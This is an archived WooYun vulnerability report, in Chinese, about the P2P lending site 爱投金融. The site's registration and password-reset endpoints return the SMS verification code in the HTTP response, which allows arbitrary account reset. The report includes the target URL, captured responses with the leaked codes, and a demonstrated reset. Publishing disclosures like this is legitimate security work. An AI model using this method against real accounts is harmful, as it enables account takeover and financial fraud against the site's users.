p2p金融安全之爱投金融任意重置帐号

admin
admin
admin
139803
文章
114
评论
2017年4月10日22:46:44评论301 views字数 237阅读0分47秒阅读模式
摘要

2016-03-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-14: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(2) 关注此漏洞

缺陷编号: WooYun-2016-190497

漏洞标题: p2p金融安全之爱投金融任意重置帐号

相关厂商: 爱投金融

漏洞作者: 路人甲

提交时间: 2016-03-30 12:11

公开时间: 2016-05-14 12:20

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 20

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 逻辑错误 手机短信/敏感功能未限制次数 搞笑有爱 支付行业敏感

0人收藏

漏洞详情

披露状态:

2016-03-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

爱投金融,成立于2011年,是一家极具创新性的互联网投融资平台,由上海财经大学多位博士和硕士创立,并聘请知名教授作顾问指导。我们从金融交易扁平化、电子化、中国全面金融发展(包含正规金融体系和民间金融),以及解决小微企业融资难题的角度来理解认识互联网融资这一新生事物,认为它代表了一种趋势,有助于推动金融市场和实体经济和谐健康发展,是小微企业融资的有效途径,发展空间巨大。
互联网融资是个人、企业及其他组织通过现代互联网技术进行的直接融资活动,是合法民事主体间融资活动的网络化。类似于货物销售从现场交易到网络交易的转变,互联网融资实现了投融资主体间资金交易线上化,提高了成交效率,降低了交易成本,促进了社会闲置资金的快速合理配置,是新型互联网技术改变人类生活方式的具体应用之一,具有广阔的发展前景。

详细说明:

首先你需要一枚18888888888的帐号

code 区域 
https://www.5aitou.com/register.htm

然后获取验证码抓包

p2p金融安全之爱投金融任意重置帐号

返回包中可以看到验证码

code 区域 
HTTP/1.1 200 OK
 Date: Tue, 29 Mar 2016 11:27:00 GMT
 Server: Apache-Coyote/1.1
 Pragma: No-cache
 Cache-Control: no-cache
 Expires: Thu, 01 Jan 1970 00:00:00 GMT
 Content-Type: application/json;charset=UTF-8
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Transfer-Encoding: chunked
 
 6b
 {"verifyCode":"7919","phoneNumber":"18888888888","phoneVerifyCode":"522319","sendType":"1","msg":"success"}
 0

验证码522319

p2p金融安全之爱投金融任意重置帐号

注册成功,通过以上可以得知,获取手机号码之后抓包看返回包可以知道验证码,那就去试试找回密码

p2p金融安全之爱投金融任意重置帐号

code 区域 
HTTP/1.1 200 OK
 Date: Tue, 29 Mar 2016 11:29:58 GMT
 Server: Apache-Coyote/1.1
 Pragma: No-cache
 Cache-Control: no-cache
 Expires: Thu, 01 Jan 1970 00:00:00 GMT
 Content-Type: application/json;charset=UTF-8
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Transfer-Encoding: chunked
 
 6b
 {"verifyCode":"6549","phoneNumber":"18888888888","phoneVerifyCode":"759411","sendType":"2","msg":"success"}
 0

验证码759411

p2p金融安全之爱投金融任意重置帐号

帐号1888888888

密码wooyun

漏洞证明:

p2p金融安全之爱投金融任意重置帐号

修复方案:

藏起来吧~

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin